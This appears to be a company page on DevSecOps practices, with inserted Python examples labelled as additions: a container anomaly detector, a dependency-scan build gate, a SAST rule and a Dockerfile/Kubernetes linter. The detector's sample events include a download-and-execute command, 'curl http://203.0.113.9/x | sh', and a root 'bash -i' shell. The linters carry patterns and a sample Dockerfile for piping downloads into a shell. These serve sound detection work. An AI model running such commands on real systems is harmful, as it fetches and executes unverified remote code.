
DevSecOps

DevSecOps practices bring a shift-left mentality to the DevOps pipeline by applying security measures at each stage of it:

CISec
  • Security measures applied during the CI (Continuous Integration) phase detect risks as early as possible in the DevOps pipeline. They usually consist of static code analysis and dependency security checks.

CDSec
  • CD (Continuous Delivery) security tests are run against the deployed artefacts, preferably in a prod-like environment. They may include dynamic code analysis and penetration tests before a release.

RuntimeSec
  • Runtime security consists of several controls, including detecting vulnerabilities in dependencies that are already running and anomalies on container platforms. These are additional security checks on top of the existing IDS/IPS/WAF protections.
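Runtime anomaly detection on a container platform, as an added example that is not part of the original page and not the logic of Prisma Cloud or any other vendor: a per-image process baseline plus a few generic rules, run over a constructed stream of process-exec events such as a container runtime or an eBPF sensor might emit. The event fields, pod names, images and the baseline are all assumptions made for the illustration.

```python
"""Baseline-based process anomaly detection for containers (added example)."""
from collections import defaultdict

# Constructed process-exec events; field names and values are invented for this example.
EVENTS = [
    {"pod": "api-7d9f", "image": "registry.example/api:1.4.2", "comm": "java",
     "cmdline": "java -jar app.jar", "uid": 1000},
    {"pod": "api-7d9f", "image": "registry.example/api:1.4.2", "comm": "sh",
     "cmdline": "sh -c 'curl http://203.0.113.9/x | sh'", "uid": 1000},
    {"pod": "web-5a1c", "image": "registry.example/web:2.0.0", "comm": "nginx",
     "cmdline": "nginx -g 'daemon off;'", "uid": 101},
    {"pod": "web-5a1c", "image": "registry.example/web:2.0.0", "comm": "bash",
     "cmdline": "bash -i", "uid": 0},
    {"pod": "api-7d9f", "image": "registry.example/api:1.4.2", "comm": "java",
     "cmdline": "java -jar app.jar", "uid": 1000},
]

# Per-image allowlist of expected process names, e.g. learned during a profiling
# period or declared alongside the image in CI (assumed content).
BASELINE = {
    "registry.example/api:1.4.2": {"java"},
    "registry.example/web:2.0.0": {"nginx"},
}
SHELLS = {"sh", "bash", "dash", "zsh"}


def classify(event, baseline=BASELINE):
    """Return the list of alert reasons for one event; an empty list means normal."""
    reasons = []
    expected = baseline.get(event["image"])
    if expected is None:
        reasons.append("image has no baseline")
    elif event["comm"] not in expected:
        reasons.append(f"process {event['comm']!r} not in baseline for image")
    if event["comm"] in SHELLS:
        reasons.append("shell spawned in container")
    if event["uid"] == 0:
        reasons.append("process running as root (uid 0)")
    if "curl" in event["cmdline"] and "| sh" in event["cmdline"]:
        reasons.append("download-and-execute pattern in command line")
    return reasons


def detect(events, baseline=BASELINE):
    """Run classify over an event stream and group the alerts by pod."""
    alerts = defaultdict(list)
    for event in events:
        reasons = classify(event, baseline)
        if reasons:
            alerts[event["pod"]].append({"cmdline": event["cmdline"], "reasons": reasons})
    return dict(alerts)


if __name__ == "__main__":
    for pod, hits in detect(EVENTS).items():
        for hit in hits:
            print(f"{pod}: {hit['cmdline']}\n    " + "; ".join(hit["reasons"]))
```

The baseline is what makes this "anomaly" detection rather than signature matching: the shell rule alone would also fire on a legitimate entrypoint script, so in practice the allowlist is what keeps the noise down, and it has to be regenerated whenever the image changes.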

Common DevSecOps Practices

Static Code Analysis (SAST)

Dynamic Code Analysis (DAST)

Library dependencies vulnerability checks

Docker Image vulnerability checks

Runtime container anomalies 

Runtime dependency security vulnerabilities


Security-as-code

Defining all security checks and controls as code is a step towards a common base with the development teams: the checks are versioned, reviewed and tested in the same way as application code.


Ultimate Shift-left:  Developer IDE

Considering that security is included in the DoD (Definition of Done), the following should be in place to enable the most shift-left:

- Secure-code guideline
- Code review
- Pair programming


OWASP Dependency-Check

Check the CVSS scores of the CVEs reported against your dependencies to decide which actions to take, for example failing the build above an agreed severity threshold.

DevSecOps Tools and Services


Dependency Checks

There are several tools and practices for dependency checks on your code. Depending on the tool's capabilities, security checks and instant feedback can be provided to developers through plugins for their development IDEs. Here are the common tools that we support for dependency controls:


We suggest these tools based on the evidence of their community and their wide support in CI/CD pipelines.
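The "check the CVE scores and take action" step from the OWASP Dependency-Check section above and the CI integration of dependency checks discussed here, as one added example that is neither Kloia's nor OWASP's code: a gate that reads a scan report, fails the job at or above a CVSS threshold, and honours suppressions only while they carry a justification and an unexpired date. The report is constructed in the shape Dependency-Check's JSON output uses (dependencies → vulnerabilities → cvssv3.baseScore); confirm that against the report your tool version emits. The library names, the CVE-0000-* identifiers, the threshold and the suppression entry are placeholders.

```python
"""Gate a CI job on a dependency scan report (added example, not Kloia's or OWASP's code)."""
import json
from datetime import date

# Constructed report; the shape follows OWASP Dependency-Check's JSON output as far as
# this script needs it. Library names and CVE-0000-* IDs are placeholders.
REPORT_JSON = """
{"dependencies": [
  {"fileName": "example-json-1.2.3.jar",
   "vulnerabilities": [
     {"name": "CVE-0000-0001", "severity": "HIGH",     "cvssv3": {"baseScore": 8.1}},
     {"name": "CVE-0000-0002", "severity": "CRITICAL", "cvssv3": {"baseScore": 9.8}}]},
  {"fileName": "example-io-2.6.jar",
   "vulnerabilities": [
     {"name": "CVE-0000-0003", "severity": "MEDIUM",   "cvssv3": {"baseScore": 4.8}}]},
  {"fileName": "example-util-31.1.jar"}
]}
"""

FAIL_THRESHOLD = 7.0  # CVSS v3 base score at or above which the job fails (assumed policy)

# Suppressions must carry a justification and an expiry so that accepted risk is
# revisited instead of silently becoming permanent (assumed entry).
SUPPRESSIONS = {
    "CVE-0000-0002": {"reason": "vulnerable class is never loaded; tracked in backlog",
                      "expires": "2099-01-01"},
}


def score_of(vuln):
    """CVSS v3 base score of a finding; a finding without a score fails closed (10.0)."""
    data = vuln.get("cvssv3") or {}
    return float(data["baseScore"]) if "baseScore" in data else 10.0


def evaluate(report_text, threshold=FAIL_THRESHOLD, suppressions=SUPPRESSIONS, today=None):
    """Sort every finding into failing / warnings / suppressed (file, CVE, score) tuples."""
    today = date.fromisoformat(today) if today else date.today()
    report = json.loads(report_text)
    result = {"failing": [], "warnings": [], "suppressed": []}
    for dep in report.get("dependencies", []):
        for vuln in dep.get("vulnerabilities", []):
            item = (dep["fileName"], vuln["name"], score_of(vuln))
            sup = suppressions.get(vuln["name"])
            if sup and date.fromisoformat(sup["expires"]) >= today:
                result["suppressed"].append(item)
            elif item[2] >= threshold:
                result["failing"].append(item)
            else:
                result["warnings"].append(item)
    return result


def gate(report_text, **kwargs):
    """Print a summary and return the exit code for the CI step: 0 pass, 1 fail."""
    result = evaluate(report_text, **kwargs)
    for bucket in ("failing", "warnings", "suppressed"):
        for file_name, cve, score in result[bucket]:
            print(f"{bucket.upper():10} {cve} (CVSS {score}) in {file_name}")
    return 1 if result["failing"] else 0


if __name__ == "__main__":
    raise SystemExit(gate(REPORT_JSON))
```

Two choices worth keeping when adapting this: a finding with no score fails the build rather than being ignored, and an expired suppression silently turns back into a failure, which is the point of giving suppressions a date.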


SAST and DAST

Static Application Security Testing (SAST) consists of code-level security checks. Although there are several programming-language-specific open-source and commercial tools, SonarQube has gained wider acceptance from the developer community and is readily accepted by development teams.
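What a code-level SAST check actually does, as an added example that is not part of the original page and not SonarQube's rule engine: a rule that walks the Python AST and reports calls to dangerous sinks (eval, exec, os.system, pickle.loads, and subprocess calls with shell=True). The sample source under review is constructed; matching is purely syntactic, which is the simplification real tools remove by resolving imports and aliases.

```python
"""A SAST-style rule over Python source, using the standard ast module (added example)."""
import ast

# Constructed sample under review. Each flagged line is a sink SAST rule sets
# commonly report; the list-form subprocess.run call is a deliberate true negative.
SAMPLE = '''
import os, subprocess, pickle

def run(user_input):
    subprocess.call("ls " + user_input, shell=True)   # command injection
    os.system(f"ping {user_input}")                   # command injection
    eval(user_input)                                  # arbitrary code execution
    subprocess.run(["ls", user_input])                # no shell: not reported
    return pickle.loads(user_input)                   # unsafe deserialization
'''

# Callee name -> explanation. Names are matched syntactically, so an alias such as
# "from os import system" would be missed; real tools resolve imports as well.
RULES = {
    "eval": "eval() on attacker-controlled input executes arbitrary code",
    "exec": "exec() on attacker-controlled input executes arbitrary code",
    "os.system": "os.system() runs a shell command built from a string",
    "pickle.loads": "pickle can run code while deserializing untrusted bytes",
}
SUBPROCESS_CALLS = {"subprocess.call", "subprocess.run", "subprocess.Popen",
                    "subprocess.check_call", "subprocess.check_output"}


def callee_name(node):
    """Dotted name of a call target ('subprocess.call', 'eval'), or '' if dynamic."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def has_shell_true(call):
    """True if the call passes shell=True as a literal keyword argument."""
    return any(kw.arg == "shell" and isinstance(kw.value, ast.Constant)
               and kw.value.value is True for kw in call.keywords)


def scan(source, filename="<input>"):
    """Return sorted (line, callee, message) findings for one source file."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = callee_name(node.func)
        if name in RULES:
            findings.append((node.lineno, name, RULES[name]))
        elif name in SUBPROCESS_CALLS and has_shell_true(node):
            findings.append((node.lineno, name,
                             "shell=True passes the command through a shell"))
    return sorted(findings)


if __name__ == "__main__":
    for line, name, msg in scan(SAMPLE, "sample.py"):
        print(f"sample.py:{line}: {name}: {msg}")
```

Run on its own, the script reports lines 5, 6, 7 and 9 of the sample and stays silent on the list-form subprocess.run call; the same findings, attached to line numbers, are what a SAST plugin surfaces inside the IDE.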

 

Dynamic Application Security Testing (DAST) tests the running application from the outside, sending requests and analysing the responses instead of reading the source. Integrating such solutions into the DevOps pipeline is also a form of shift-left, with tools such as Fortify WebInspect.

 

 


Container and Kubernetes Security

Containers and their orchestration platform, Kubernetes, should also be subject to several security measures, controls and checks.

The "shift-left" approach for Docker containers and Kubernetes consists of analyzing security risks at the Dockerfile level and in the cluster-wide and application-specific Kubernetes declarative definitions. At Kloia, we benefit from several open-source and commercial tools, as well as internal practices, to identify such risks. We also have a "Kubernetes Audit" solution, in which we check Kubernetes clusters in four dimensions, including security, and we refer to the CIS Kubernetes Benchmarks as a reference guide.
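The Dockerfile-level and manifest-level analysis described above, as an added example that is not Kloia's tooling or code and not a CIS Benchmark implementation; it also illustrates the security-as-code idea from the earlier section, since the checks live in a script that can be versioned and run in CI. The Dockerfile and the Pod spec are constructed with deliberate weaknesses; the Pod spec is given as a dict (the JSON form kubectl also accepts) to keep the script free of a YAML dependency. Image names and the rule set are assumptions.

```python
"""Shift-left checks over a Dockerfile and a Kubernetes Pod spec (added example)."""
import re

# Constructed Dockerfile with several common weaknesses.
DOCKERFILE = """\
FROM python:latest
ADD https://example.com/install.sh /tmp/install.sh
RUN curl -sSL https://example.com/tool.sh | sh
COPY . /app
CMD ["python", "/app/main.py"]
"""

# Constructed Pod spec: the first container is weak, the second shows the hardened form.
POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "api"},
    "spec": {
        "hostNetwork": True,
        "containers": [
            {"name": "api", "image": "registry.example/api:1.4.2",
             "securityContext": {"privileged": True}},
            {"name": "sidecar", "image": "registry.example/sidecar:0.3.0",
             "securityContext": {"runAsNonRoot": True, "allowPrivilegeEscalation": False,
                                 "readOnlyRootFilesystem": True,
                                 "capabilities": {"drop": ["ALL"]}},
             "resources": {"limits": {"cpu": "100m", "memory": "64Mi"}}},
        ],
    },
}


def lint_dockerfile(text):
    """Return (line, message) findings; line 0 means the file as a whole."""
    findings, has_user = [], False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        instr, _, args = line.partition(" ")
        instr, args = instr.upper(), args.strip()
        if instr == "FROM":
            image = args.split()[0]
            if image != "scratch" and "@sha256:" not in image and \
                    (":" not in image or image.endswith(":latest")):
                findings.append((lineno, "base image not pinned (no tag or :latest)"))
        elif instr == "ADD" and re.match(r"https?://", args):
            findings.append((lineno, "ADD from URL; COPY a verified artefact instead"))
        elif instr == "RUN" and re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", args):
            findings.append((lineno, "piping a download into a shell runs unverified code"))
        elif instr == "USER" and args not in ("root", "0"):
            has_user = True
    if not has_user:
        findings.append((0, "no USER instruction; container runs as root by default"))
    return findings


def lint_pod(manifest):
    """Return (scope, message) findings for a Pod manifest given as a dict."""
    findings = []
    spec = manifest.get("spec", {})
    if spec.get("hostNetwork"):
        findings.append(("pod", "hostNetwork shares the node's network namespace"))
    pod_sc = spec.get("securityContext", {})
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name, sc = c["name"], c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append((name, "privileged container has full access to the node"))
        if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):
            findings.append((name, "runAsNonRoot not set; image may run as root"))
        if sc.get("allowPrivilegeEscalation") is not False:
            findings.append((name, "allowPrivilegeEscalation not disabled"))
        if not sc.get("readOnlyRootFilesystem"):
            findings.append((name, "root filesystem is writable"))
        if "ALL" not in sc.get("capabilities", {}).get("drop", []):
            findings.append((name, "capabilities not dropped (drop: [ALL])"))
        if not c.get("resources", {}).get("limits"):
            findings.append((name, "no resource limits; a compromised process can exhaust the node"))
    return findings


if __name__ == "__main__":
    for line, msg in lint_dockerfile(DOCKERFILE):
        print(f"Dockerfile:{line}: {msg}")
    for scope, msg in lint_pod(POD):
        print(f"pod/{scope}: {msg}")
```

In a pipeline the two functions would run as a pre-build and pre-deploy step and fail the job on any finding; the hardened sidecar container produces none, which is the shape the application container should be brought to.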

 

Regarding runtime security, although we have tried out the alternatives, Prisma Cloud (formerly Twistlock) became the Kloian choice thanks to its wider support, especially for runtime security. It also has broader features, including public-cloud and dependency checks, which means it plays a wider role in that security domain.
 
